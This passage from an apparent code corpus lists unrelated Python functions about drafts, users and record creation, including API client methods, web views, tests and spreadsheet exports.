iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method post_integrations_actions_drafts\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `post_integrations_actions_drafts`\")\n\n\n resource_path = '/api/v2/integrations/actions/drafts'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='Action',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def import_workflows_from_dict(\n self, workflows_dict, validate=True, base_path=''\n ):\n workflow_name2id = {}\n for workflow in iter(workflows_dict.values()):\n\n valid_def = {}\n if validate:\n valid_def = Definition.validate_workflow(workflow)\n if valid_def is False:\n Log.an().error('invalid workflow:\\n%s', yaml.dump(workflow))\n return False\n\n else:\n valid_def = workflow\n\n if not self.add_linked_apps(valid_def, base_path):\n Log.an().error(\n 'cannot add linked apps for workflow: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n if not self.synchronize_workflow_with_db(valid_def):\n Log.an().error(\n 'cannot synchronize workflow with data source: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # insert workflow record\n workflow_id = self.add_workflow({\n 'name': valid_def['name'],\n 'description': valid_def['description'],\n 'username': valid_def['username'],\n 'inputs': json.dumps(valid_def['inputs']),\n 'apps': json.dumps(valid_def['apps']),\n 'git': valid_def['git'],\n 'parameters': json.dumps(valid_def['parameters']),\n 'final_output': json.dumps(valid_def['final_output']),\n 'public': valid_def['public'],\n 'enable': valid_def['enable'],\n 'test': valid_def['test'],\n 'version': valid_def['version']\n })\n if not workflow_id:\n Log.an().error(\n 'cannot add workflow to data source: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n workflow_name2id[valid_def['name']] = workflow_id\n valid_def['workflow_id'] = workflow_id\n\n # insert steps, create map of steps\n step_name2id = self.import_workflow_steps_from_dict(valid_def)\n if not step_name2id:\n Log.an().error(\n 'cannot add workflow steps to database: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # insert dependency records\n if not self.import_step_depends_from_dict(valid_def, step_name2id):\n Log.an().error(\n 'cannot add workflow step dependencies: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n return workflow_name2id", "def setup_people(access_control_list):\n all_users = set()\n for users in access_control_list.values():\n all_users.update({(user[\"email\"], user[\"name\"]) for user in users})\n\n with factories.single_commit():\n for email, name in all_users:\n factories.PersonFactory(email=email, name=name)", "def _save_drafts(self):\n ##logging.info('SAVING: %s -> %s', self.email, self._drafts)\n memcache.set('user_drafts:' + self.email, self._drafts, 3600)", "def post(self):\n body = request.get_json()\n username = body.get('user')\n user = query_user_by_name(username)\n if user is None:\n return 'User does not exist', 404\n if invalid_user(username):\n return 'Unauthorized User', 401\n book_id = body.get('book_id')\n if query_book_by_id(book_id) is None:\n return 'Book ID not found ' + str(book_id), 409\n new_copy = models.Copy()\n new_copy.parse_body(body)\n new_copy.status = BOOK_COPY_STATUS_AVAILABLE\n db.session.add(new_copy)\n db.session.commit()\n return new_copy.serialize(), 201", "def post(self):\n\n args = self.reqparse.parse_args()\n\n if not args['date']:\n args['date'] = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')\n models.Exercise.create(exercise_user=args['userId'], **args)\n\n user = models.ExerciseUser.get(id=args['userId'])\n\n marshalled_user = marshal(models.ExerciseUser.get(id=args['userId']), user_fields_with_exercises)\n marshalled_user['exercises'] = [marshal(exercise, exercise_fields) for exercise in user.exercises]\n\n return marshalled_user, 201, {'Location': url_for('resources.exercise.user', userId=args['userId'])}", "def test_01_check_to_state_draft_post(self):\r\n cr, uid = self.cr, self.uid\r\n filter_draft = self.create_filter_draft(cr, uid)\r\n self.create_rule(cr, uid, 'on_create')\r\n new_lead_id = self.create_lead_test_1(cr, uid)\r\n new_lead = self.model.browse(cr, uid, new_lead_id)\r\n self.assertEquals(new_lead.state, 'draft')\r\n self.assertEquals(new_lead.user_id.id, self.demo)\r\n self.delete_rules(cr, uid)", "def create_user_emails_sheets_restaurant_owners():\n input_range = \"Sheet1\"\n\n sheetsService = build(\n 'sheets', 'v4', credentials=credentials, cache_discovery=False)\n\n # Empty sheet\n sheetsService.spreadsheets().values().clear(\n spreadsheetId=spreadsheet_id, range=input_range).execute()\n\n # Get all basic users' email\n restaurant_owners = list(User.objects.filter(\n is_active=True, role=\"RO\").values('email', 'username'))\n\n # Append user info into values (only users that has email verified)\n values = [['Email', 'Username']]\n for restaurant_owner in restaurant_owners:\n values.append(list(restaurant_owner.values()))\n\n body = {\n 'values': values\n }\n\n try:\n sheetsService.spreadsheets().values().update(spreadsheetId=spreadsheet_id, range=input_range,\n valueInputOption=\"USER_ENTERED\", body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error\n # return None\n\n # Automatically format the sheets\n requests = [\n {\n \"autoResizeDimensions\": {\n \"dimensions\": {\n \"sheetId\": 0,\n \"dimension\": \"COLUMNS\",\n \"startIndex\": 0,\n \"endIndex\": 2\n }\n }\n },\n {\n \"repeatCell\": {\n \"range\": {\n \"sheetId\": 0,\n \"startRowIndex\": 0,\n \"endRowIndex\": 1,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 2\n },\n \"cell\": {\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n },\n \"fields\": \"userEnteredFormat(textFormat)\"\n }\n }\n ]\n\n body = {\n 'requests': requests\n }\n\n try:\n sheetsService.spreadsheets().batchUpdate(\n spreadsheetId=spreadsheet_id, body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error", "def list_drafts(self) -> PagingList[Draft]:\n return PagingList(self._generate_drafts, 128)", "def create(requests, user=None):\n return rest.post_multi(resource=_resource, entities=requests, user=user)", "def copy_to_teamusercopy(apps, schema_editor):\n TeamUser = apps.get_model('status', 'TeamUser')\n TeamUserCopy = apps.get_model('status', 'TeamUserCopy')\n\n for teamuser in TeamUser.objects.all():\n if TeamUserCopy.objects.filter(team_id=teamuser.team_id, user_id=teamuser.user_id).count() == 0:\n TeamUserCopy.objects.create(team_id=teamuser.team_id, user_id=teamuser.user_id)\n print('Created %s %s' % (teamuser.team_id, teamuser.user_id))\n else:\n print('Already exists... skipping')", "def test_create_from_dict(session): # pylint:disable=unused-argument\n user = User(username='CP1234567',\n keycloak_guid='1b20db59-19a0-4727-affe-c6f64309fd04')\n\n session.add(user)\n session.commit()\n\n org_type = OrgTypeModel(code='TEST', description='Test')\n session.add(org_type)\n session.commit()\n\n org_status = OrgStatusModel(code='TEST', description='Test')\n session.add(org_status)\n session.commit()\n\n preferred_payment = PaymentTypeModel(code='TEST', description='Test')\n session.add(preferred_payment)\n session.commit()\n\n org = OrgModel()\n org.name = 'Test Org'\n org.org_type = org_type\n org.org_status = org_status\n org.preferred_payment = preferred_payment\n org.save()\n\n invitation_info = {\n 'recipientEmail': 'abc.test@gmail.com',\n 'membership': [\n {\n 'membershipType': 'USER',\n 'orgId': org.id\n }\n ]\n }\n result_invitation = InvitationModel.create_from_dict(invitation_info, user.id, 'STANDARD')\n\n assert result_invitation.id is not None", "def save_draft(self, review_request):\r\n self.api_call('api/review-requests/%s/draft/save/' %\r\n review_request['id'])\r\n self.debug('Review request draft saved')", "def post_list(self, request, **kwargs):\n deserialized = self.deserialize(request, request.raw_post_data, format=request.META.get('CONTENT_TYPE', 'application/json'))\n\n # Force this in an ugly way, at least should do \"reverse\"\n deserialized[\"user\"] = \"/api/v1/user/%s/\" % request.user.id\n bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized))\n self.is_valid(bundle, request)\n updated_bundle = self.obj_create(bundle, request=request)\n return HttpCreated(location=self.get_resource_uri(updated_bundle))", "def delete_drafts(request):\n query = models.Comment.query(\n models.Comment.author == request.user, models.Comment.draft == True,\n ancestor=request.issue.key)\n keys = query.fetch(keys_only=True)\n ndb.delete_multi(keys)\n request.issue.calculate_draft_count_by_user()\n request.issue.put()\n return HttpResponseRedirect(\n reverse(publish, args=[request.issue.key.id()]))", "def create_dict(self, dict_type, upload_id, download_id,\n pub_user, module_supplier_id):\n response = self.do_request(\n self.base_url +\n \"/oasis/create\" + self.types[dict_type] + \"/\" +\n pub_user + \"/\" +\n str(module_supplier_id) + \"/\" +\n str(upload_id) + \"/\" +\n str(download_id) + \"/\"\n )\n return response", "def create_guests(self) -> None:\n\n assert self.shelf\n\n from .return_guest_to_shelf import return_guest_to_shelf\n\n for _ in range(self.guest_count):\n guestname = str(uuid.uuid4())\n\n stmt = GuestRequest.create_query(\n guestname=guestname,\n environment=self.environment,\n ownername=self.shelf.ownername,\n shelfname=self.shelfname,\n ssh_keyname=self.guest_template.keyname,\n ssh_port=DEFAULT_SSH_PORT,\n ssh_username=DEFAULT_SSH_USERNAME,\n priorityname=self.guest_template.priority_group,\n user_data=self.guest_template.user_data,\n skip_prepare_verify_ssh=self.guest_template.skip_prepare_verify_ssh,\n post_install_script=self.guest_template.post_install_script,\n log_types=self.log_types,\n watchdog_dispatch_delay=self.guest_template.watchdog_dispatch_delay,\n watchdog_period_delay=self.guest_template.watchdog_period_delay,\n bypass_shelf_lookup=True,\n on_ready=[(return_guest_to_shelf, [GuestState.READY.value])]\n )\n\n r_guest = execute_db_statement(self.logger, self.session, stmt)\n\n if r_guest.is_error:\n self.result = self.handle_error(r_guest, 'failed to create new guest')\n return\n\n GuestRequest.log_event_by_guestname(\n self.logger, # shelf logger, does not contain guestname\n self.session,\n guestname,\n 'created',\n **{\n 'environment': self.environment.serialize(),\n 'user_data': self.guest_template.user_data\n }\n )\n\n self.request_task(guest_shelf_lookup, guestname)\n\n if self.result:\n return", "def create_matching_proposals(self):\n user_id = self.context['request'].user.pk\n\n query = \"\"\"\n INSERT INTO public.core_proposal (form_id, offer_id, status, created_at) \n SELECT public.core_form.id, public.core_offer.id, 'new', %s \n FROM public.core_form INNER JOIN public.core_offer \n ON public.core_offer.min_rating <= public.core_form.rating \n AND public.core_form.rating<= public.core_offer.max_rating \n AND NOT EXISTS \n (SELECT 1 FROM public.core_proposal WHERE public.core_form.id = form_id AND public.core_offer.id = offer_id)\n WHERE public.core_form.user_id=%s\n RETURNING form_id, offer_id, id\n \"\"\".strip()\n\n with connection.cursor() as cursor:\n cursor.execute(\n query,\n [date.today().strftime('%Y-%m-%d'), user_id]\n )\n rows = cursor.fetchall()\n if not rows:\n return None\n\n proposal_ids = []\n for row in rows:\n proposal_ids.append(row[2])\n\n proposals = Proposal.objects.filter(pk__in=proposal_ids)\n items = []\n for proposal in proposals:\n form = proposal.form\n offer = proposal.offer\n form_dict = form.__dict__\n offer_dict = offer.__dict__\n del form_dict['_state']\n del offer_dict['_state']\n items.append((form_dict, offer_dict, proposal.pk))\n\n for item in items:\n make_pdf.apply_async(\n args=(\n item[0], item[1], item[2]\n )\n )", "def backup_all(users_dict: dict, start_idx: int, num_checked_emails: int)\\\n -> None:\n backup_users_dict(users_dict)\n backup_int_in_fname(start_idx, START_IDX_FNAME)\n backup_int_in_fname(num_checked_emails, CHECKED_EMAILS_FNAME)", "def _add_draft_modules_to_course(self, published_course_key, course_key, user):\r\n # each true update below will trigger a new version of the structure. We may want to just have one new version\r\n # but that's for a later date.\r\n new_draft_course_loc = published_course_key.for_branch('draft')\r\n # to prevent race conditions of grandchilden being added before their parents and thus having no parent to\r\n # add to\r\n awaiting_adoption = {}\r\n for module in self.draft_modulestore.get_items(course_key):\r\n if getattr(module, 'is_draft', False):\r\n new_locator = self.loc_mapper.translate_location(\r\n module.location, False, add_entry_if_missing=True\r\n )\r\n if self.split_modulestore.has_item(new_locator):\r\n # was in 'direct' so draft is a new version\r\n split_module = self.split_modulestore.get_item(new_locator)\r\n # need to remove any no-longer-explicitly-set values and add/update any now set values.\r\n for name, field in split_module.fields.iteritems():\r\n if field.is_set_on(split_module) and not module.fields[name].is_set_on(module):\r\n field.delete_from(split_module)\r\n for name, field in module.fields.iteritems():\r\n # draft children will insert themselves and the others are here already; so, don't do it 2x\r\n if name != 'children' and field.is_set_on(module):\r\n field.write_to(split_module, field.read_from(module))\r\n\r\n _new_module = self.split_modulestore.update_item(split_module, user.id)\r\n else:\r\n # only a draft version (aka, 'private'). parent needs updated too.\r\n # create a new course version just in case the current head is also the prod head\r\n _new_module = self.split_modulestore.create_item(\r\n new_draft_course_loc, module.category, user.id,\r\n block_id=new_locator.block_id,\r\n fields=self._get_json_fields_translate_references(module, course_key, True)\r\n )\r\n awaiting_adoption[module.location] = new_locator\r\n for draft_location, new_locator in awaiting_adoption.iteritems():\r\n for parent_loc in self.draft_modulestore.get_parent_locations(draft_location):\r\n old_parent = self.draft_modulestore.get_item(parent_loc)\r\n new_parent = self.split_modulestore.get_item(\r\n self.loc_mapper.translate_location(old_parent.location, False)\r\n )\r\n # this only occurs if the parent was also awaiting adoption\r\n if any(new_locator == child.version_agnostic() for child in new_parent.children):\r\n break\r\n # find index for module: new_parent may be missing quite a few of old_parent's children\r\n new_parent_cursor = 0\r\n for old_child_loc in old_parent.children:\r\n if old_child_loc == draft_location:\r\n break\r\n sibling_loc = self.loc_mapper.translate_location(old_child_loc, False)\r\n # sibling may move cursor\r\n for idx in range(new_parent_cursor, len(new_parent.children)):\r\n if new_parent.children[idx].version_agnostic() == sibling_loc:\r\n new_parent_cursor = idx + 1\r\n break\r\n new_parent.children.insert(new_parent_cursor, new_locator)\r\n new_parent = self.split_modulestore.update_item(new_parent, user.id)", "def create_from_dict(user_data_dict: dict):\n empty = create_empty()\n user_data = _dict_to_dict(empty, user_data_dict)\n return user_data", "def test_create_with_existing_new_draft(self):\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n rich_text=True,\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n # Create the first draft.\n orig_draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(orig_draft.changedesc)\n\n # Try to create it again.\n draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(draft.changedesc)\n\n self.assertEqual(orig_draft, draft)\n self.assertEqual(orig_draft.changedesc, draft.changedesc)", "def drafts_view(self, request, object_id, extra_context=None):\n opts = self.model._meta\n action_list = [{\"revision\": version.revision,\n \"url\": reverse(\"admin:%s_%s_draft\" % (opts.app_label, opts.module_name), args=(version.object_id, version.revision.id))}\n for version in self.get_draft_versions(object_id).select_related(\"revision\")]\n context = {\n \"action_list\": action_list, \n \"title\": _(\"Unpublished items\"), \n 'draft_view':True, \n 'has_draft':self.has_draft(object_id)\n }\n context.update(extra_context or {})\n return super(EasyPublisher, self).history_view(request, object_id, context)", "def create_advisors(_advisors_data):\n\n for advisor_data in _advisors_data:\n occupations = advisor_data.pop('occupations', '').strip()\n specialties = advisor_data.pop('specialties', '').strip()\n subspecialties = advisor_data.pop('subspecialties', '').strip()\n prev_firms = advisor_data.pop('previous_firms', '').strip()\n curr_firm_name = advisor_data.pop('current_firm_name', '').strip()\n location = advisor_data.pop('location', '').strip()\n\n city, state_abbr = location.split(', ') if location.count(',') == 1 else (None, '')\n\n advisor_data['city'] = city\n advisor_data['state'] = ABBR_TO_STATE.get(state_abbr, 'Other')\n\n advisor_data['status'] = 'Active'\n\n success, result = create_advisor(advisor_data)\n validate(success, result)\n\n advisor = result\n\n occupation_objs = []\n\n if occupations:\n for occupation_name in occupations.split(', '):\n if occupation_name not in OCCUPATIONS:\n continue\n\n success, result = create_occupation({'name': occupation_name.strip().title()})\n validate(success, result)\n\n occupation = result\n occupation_objs.append(occupation)\n\n advisor.occupations.append(occupation)\n\n db.session.commit()\n\n if specialties:\n for specialty_name in specialties.split(', '):\n\n spec_occ = None\n for occupation in occupation_objs:\n if specialty_name in OCCUPATIONS[occupation.name]:\n spec_occ = occupation\n break\n\n if not spec_occ:\n continue\n\n success, result = create_specialty({\n 'name': specialty_name.strip().title(),\n 'occupation_id': spec_occ.pk_id,\n 'occupation': spec_occ\n })\n\n validate(success, result)\n\n specialty = result\n advisor.specialties.append(specialty)\n\n db.session.commit()\n\n if subspecialties:\n advisor.subspecialty_text = subspecialties\n\n db.session.commit()\n\n if prev_firms:\n for prev_firm_name in prev_firms.split(', '):\n success, result = create_bigfirm({'name': prev_firm_name.strip()})\n validate(success, result)\n\n big_firm = result\n advisor.previous_firms.append(big_firm)\n\n db.session.commit()\n\n if curr_firm_name:\n success, result = create_bigfirm({'name': curr_firm_name.strip()})\n validate(success, result)\n\n big_firm = result\n advisor.current_firm = big_firm\n advisor.current_firm_id = big_firm.pk_id\n\n db.session.commit()\n\n db.session.commit()", "def test_expected_users(self):\n print()\n print(\"Testing users whose parameters are safe...\")\n for user_id in self.get_unique_ids(100):\n self.store_expected_user(user_id)\n \n User.objects.all().delete()\n print(\"Testing many users whose parameters are safe with bulk_create...\")\n self.store_many_expected_users()\n\n print(\"-\" * 10)", "def test_create_draft_with_update(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'metadata': {'due': '2077-10-10T04:00Z'},\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n published = self.get_item_from_modulestore(self.problem_usage_key, False)\r\n self.assertIsNone(published.due)\r\n draft = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertEqual(draft.due, datetime(2077, 10, 10, 4, 0, tzinfo=UTC))", "def create_post(user_id):\n\n user = User.query.get_or_404(user_id)\n title = request.form['title']\n content = request.form['content']\n tag_ids = [int(num) for num in request.form.getlist(\"tags\")]\n tags = Tag.query.filter(Tag.id.in_(tag_ids)).all()\n \n new_post = Post(title=title, content=content, user=user, tags=tags)\n db.session.add(new_post)\n db.session.commit()\n\n return redirect(f\"/users/{user_id}\")", "async def new_dictionary(message: Message):\n dictionaries = await db.select_dictionaries(message.from_user.id)\n if len(dictionaries) == 10: # Limit in 10 dictionaries for user\n await message.answer(\"Вы не можете создать больше 10 словарей!\")\n else: # Available to add one more dictionaries\n await message.answer(\"Напиши название своего словаря\", reply_markup=ReplyKeyboardRemove())\n await CreateNewDict.SetDictionaryName.set()", "def drafts():\n query = Entry.drafts().order_by(Entry.last_mod_date.desc())\n return object_list('index.html', query)", "def prepare_draft_rulings(self):\r\n records = self.retrieve_cached_records()\r\n if records:\r\n records = self.apply_rulings(records)\r\n records = u.apply_aggregators(\r\n map(lambda rc: (rc[0], rc[2]), self.ruling_columns),\r\n records\r\n )\r\n else:\r\n records = [] # might be None\r\n\r\n u.write_excel(\r\n records,\r\n self.draft_ruling_path,\r\n OrderedDict(map(lambda rc: (rc[0], rc[1]), self.ruling_columns)),\r\n )", "def _generate_users(self):\n users = {}\n args = self._add_user()\n #Grab info from args\n users[args[\"userID\"]] = {}\n users[args[\"userID\"]][\"name\"] = args[\"name\"]\n users[args[\"userID\"]][\"webhook_url\"] = args[\"webhook_url\"]\n users[args[\"userID\"]][\"blacklist\"] = args[\"blacklist\"]\n #Try to grab override info, default to blank if doesn't exist\n users[args[\"userID\"]][\"override_user\"] = args.get(\"overrideUser\", \"\")\n users[args[\"userID\"]][\"override_userid\"] = args.get(\"overrideUserID\", \"\")\n users[args[\"userID\"]][\"override_oauth\"] = args.get(\"overrideOauth\", \"\")\n fileIO.save_json(\"users.json\", users)", "def create_item(self, user: User, **kwargs) -> None:", "def create_user_emails_sheets_subscribers():\n input_range = \"Sheet1\"\n\n sheetsService = build(\n 'sheets', 'v4', credentials=credentials, cache_discovery=False)\n\n # Empty sheet\n sheetsService.spreadsheets().values().clear(\n spreadsheetId=spreadsheet_id, range=input_range).execute()\n\n # Get all basic users' email\n users = list(User.objects.filter(is_active=True,\n role=\"BU\").values('email', 'profile_id'))\n\n # Check their consent status and update accordingly\n subscribers = []\n for user in users:\n if user['profile_id'] != None:\n profile = SubscriberProfile.objects.get(id=user['profile_id'])\n status = profile.consent_status\n if status == \"IMPLIED\" and profile.expired_at < date.today():\n profile.consent_status = \"EXPIRED\"\n profile.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n user.pop('profile_id')\n user.update({\"first_name\": profile.first_name,\n \"last_name\": profile.last_name, \"consent_status\": profile.consent_status})\n subscribers.append(user)\n\n # Get newsletter only users' email\n nlusers = list(NLUser.objects.all())\n\n # Check their consent status and update accordingly\n for nluser in nlusers:\n status = nluser.consent_status\n if status == \"IMPLIED\" and nluser.expired_at < date.today():\n nluser.consent_status = \"EXPIRED\"\n nluser.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n subscribers.append({\"email\": nluser.email, \"first_name\": nluser.first_name,\n \"last_name\": nluser.last_name, \"consent_status\": nluser.consent_status})\n\n # Append user info into values (only users that has email verified)\n values = [['Email', 'First name', 'Last name', 'Consent Status']]\n for subscriber in subscribers:\n values.append(list(subscriber.values()))\n\n body = {\n 'values': values\n }\n\n try:\n sheetsService.spreadsheets().values().update(spreadsheetId=spreadsheet_id, range=input_range,\n valueInputOption=\"USER_ENTERED\", body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error\n # return None\n\n # Automatically format the sheets\n requests = [\n {\n \"autoResizeDimensions\": {\n \"dimensions\": {\n \"sheetId\": 0,\n \"dimension\": \"COLUMNS\",\n \"startIndex\": 0,\n \"endIndex\": 4\n }\n }\n },\n {\n \"repeatCell\": {\n \"range\": {\n \"sheetId\": 0,\n \"startRowIndex\": 0,\n \"endRowIndex\": 1,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 4\n },\n \"cell\": {\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n },\n \"fields\": \"userEnteredFormat(textFormat)\"\n }\n }\n ]\n\n body = {\n 'requests': requests\n }\n\n try:\n sheetsService.spreadsheets().batchUpdate(\n spreadsheetId=spreadsheet_id, body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error", "def test_save_draft():\n with open(basedir + \"fixture/7149593_formatted.json\", \"r\") as f:\n storage.save_draft(user_id, \"bib\", \"7149593\", f.read(), \"1362044230872\")\n with open(basedir + \"some/path/\" + user_id + \"/bib/7149593\", \"r\") as f:\n json_data = json.loads(f.read())\n assert json_data['document']['@id'].rsplit(\"/\",1)[1] == '7149593'\n assert json_data['etag'] == \"1362044230872\"", "def test_transitions_create_suspended(self):\n\n self.transition_data['status'] = 'SUSPENDED'\n\n transition = self.client.users(\n self.user.token).transitions.create(self.transition_data)\n\n verify_user_transition(self, transition, self.transition_data)", "def get_or_create_bundle_draft(bundle_uuid, draft_name):\n bundle = get_bundle(bundle_uuid)\n try:\n return get_draft(bundle.drafts[draft_name]) # pylint: disable=unsubscriptable-object\n except KeyError:\n # The draft doesn't exist yet, so create it:\n response = api_request('post', api_url('drafts'), json={\n \"bundle_uuid\": str(bundle_uuid),\n \"name\": draft_name,\n })\n # The result of creating a draft doesn't include all the fields we want, so retrieve it now:\n return get_draft(UUID(response[\"uuid\"]))", "def post(self, *args, **kwargs):\n name = self.get_argument('name', None)\n description = self.get_argument('description', None)\n url = self.get_argument('url', None)\n leader = self.get_argument('leader', None)\n members = self.get_argument('members', None)\n teams = self.get_argument('teams', None)\n repos = self.get_argument('repos', None)\n tags = self.get_argument('tags', None)\n if 'user' not in kwargs:\n self.raise401()\n\n try:\n # todo - better arguments handler\n url = url.strip()\n url = url if url else None\n members_list = []\n repos_list = []\n teams_list = []\n project_leader = kwargs['user']\n if leader:\n project_leader = User.objects(username=leader).first()\n\n if repos:\n for repo in parse_listed_strs(repos):\n r = Repo.objects(name=repo).first()\n if not r:\n continue\n repos_list.append(r)\n if members:\n for member in parse_listed_strs(members):\n u = User.objects(username=member).first()\n if not u or u == project_leader:\n continue\n members_list.append(u)\n if teams:\n for team in parse_listed_strs(teams):\n t = Team.objects(name=team).first()\n if not t:\n continue\n teams_list.append(t)\n members_list.append(project_leader)\n tags_list = parse_listed_strs(tags)\n project = Project(\n name=name, description=description,\n url=url, repos=repos_list,\n leader=project_leader, members=members_list,\n teams=teams_list, tags=tags_list)\n project.save()\n project_data = document_to_json(project, filter_set=_FILTER)\n self.set_status(201)\n self.write(project_data)\n except Exception as e:\n reason = e.message\n self.raise400(reason=reason)", "def test_make_draft(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'create_draft'}\r\n )\r\n # Update the draft version and check that published is different.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'metadata': {'due': '2077-10-10T04:00Z'}}\r\n )\r\n published = self.get_item_from_modulestore(self.problem_usage_key, False)\r\n self.assertIsNone(published.due)\r\n draft = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertEqual(draft.due, datetime(2077, 10, 10, 4, 0, tzinfo=UTC))", "def new(user, requested_players):\n main_grid = [[0]*9 for _ in range(9)]\n wallv_grid = [[0]*8 for _ in range(9)]\n wallh_grid = [[0]*9 for _ in range(8)]\n wallfills_grid = [[0]*8 for _ in range(8)]\n game_id = randint(0, 1000000)\n last_status = json.dumps({\"status\": \"Waiting for other players to join...\",\n \"waiting\": True})\n if requested_players == \"two\":\n# while TwoPlayerGame.objects.filter(game_id=game_id):\n# game_id = randint(0, 10000)\n user.two_player_game_id = game_id\n main_grid[0][4] = 1\n main_grid[8][4] = 2\n TwoPlayerGame.objects.create(\n game_id=game_id,\n player1=user,\n player1_walls=10,\n player2_walls=10,\n main_grid=json.dumps(main_grid),\n wallv_grid=json.dumps(wallv_grid),\n wallh_grid=json.dumps(wallh_grid),\n wallfills_grid=json.dumps(wallfills_grid),\n last_status=last_status,\n turn=user)\n if requested_players == \"four\":\n# while FourPlayerGame.objects.filter(game_id=game_id):\n# game_id = randint(0, 10000)\n user.four_player_game_id = game_id\n main_grid[0][4] = 1\n main_grid[8][4] = 2\n main_grid[4][0] = 3\n main_grid[4][8] = 4\n FourPlayerGame.objects.create(\n game_id=game_id,\n player1=user,\n player1_walls=5,\n player2_walls=5,\n player3_walls=5,\n player4_walls=5,\n main_grid=json.dumps(main_grid),\n wallv_grid=json.dumps(wallv_grid),\n wallh_grid=json.dumps(wallh_grid),\n wallfills_grid=json.dumps(wallfills_grid),\n last_status=last_status,\n turn=user)\n user.save()\n return", "def _create_instance(self, user_id, project_id):\n inst = {}\n inst['user_id'] = user_id\n inst['project_id'] = project_id\n\n return db.instance_create(self.context, inst)", "def create_post(user_id):\n if CURRENT_USER_KEY not in session or session[CURRENT_USER_KEY] != user_id:\n raise Unauthorized\n\n user = User.query.get_or_404(user_id)\n\n form = PostForm()\n form.muscles.choices = [(m.id, m.name) for m in Muscle.query.all()]\n form.equipment.choices = [(e.id, e.name) for e in Equipment.query.all()]\n # import pdb\n # pdb.set_trace()\n if form.validate_on_submit():\n title = form.title.data\n details = form.details.data\n is_private = form.is_private.data\n muscles = form.muscles.data\n equipment = form.equipment.data\n post = Post(title=title, details=form.details.data,\n is_private=form.is_private.data, user_id=user_id)\n db.session.add(post)\n db.session.commit()\n\n # create join table additions\n muscles_to_add = []\n equipment_to_add = []\n for muscle in muscles:\n muscle_post = PostMuscle(post_id=post.id, muscle_id=muscle)\n muscles_to_add.append(muscle_post)\n for choice in equipment:\n equipment_post = PostEquipment(\n post_id=post.id, equipment_id=choice)\n equipment_to_add.append(equipment_post)\n db.session.add_all(muscles_to_add + equipment_to_add)\n db.session.commit()\n flash('New post created!', 'success')\n return redirect(url_for('show_user_profile', user_id=user_id))\n return render_template('add_post.html', form=form, user=user)", "def populate(N=5):\n for entry in range(N):\n # Create the fake data for the entry\n fake_name = fakegen.name().split()\n fake_first_name = fake_name[0]\n fake_last_name = fake_name[1]\n fake_email = fakegen.email()\n\n # Create the new User entry\n user = User.objects.get_or_create(first_name=fake_first_name, last_name=fake_last_name, email=fake_email)[0]", "def create_new_toppings(user_data):\n new_topping_res = requests.post(url=\"http://127.0.0.1:5000/create_new_toppings\", json=user_data)\n return new_topping_res.text", "def post(self): # pylint:disable-msg=C0103\n response = {'batch_populated': False}\n try:\n # Will raise an AttributeError if no current user\n user_id = users.get_current_user().user_id()\n # TODO: return 400 if not logged in\n work = []\n for row, column in RandomRowColumnOrdering(ROWS, COLUMNS):\n args = (row, column, user_id)\n work.append((SendColor, args, {})) # No keyword args\n\n PopulateBatch(user_id, work)\n response['batch_populated'] = True\n except: # pylint:disable-msg=W0702\n # TODO: Consider logging traceback.format_exception(*sys.exc_info()) here\n pass\n self.response.write(json.dumps(response))", "def populate_poll(user=\"\",total=10):\n user_list = None\n #create random user only when user argument empty\n if user == \"\":\n create_random_user(20)\n user_list = User.objects.all()\n \n for i in range(total):\n Question.objects.create(\n created_by=random.choice(user_list) if user_list is not None else user,\n 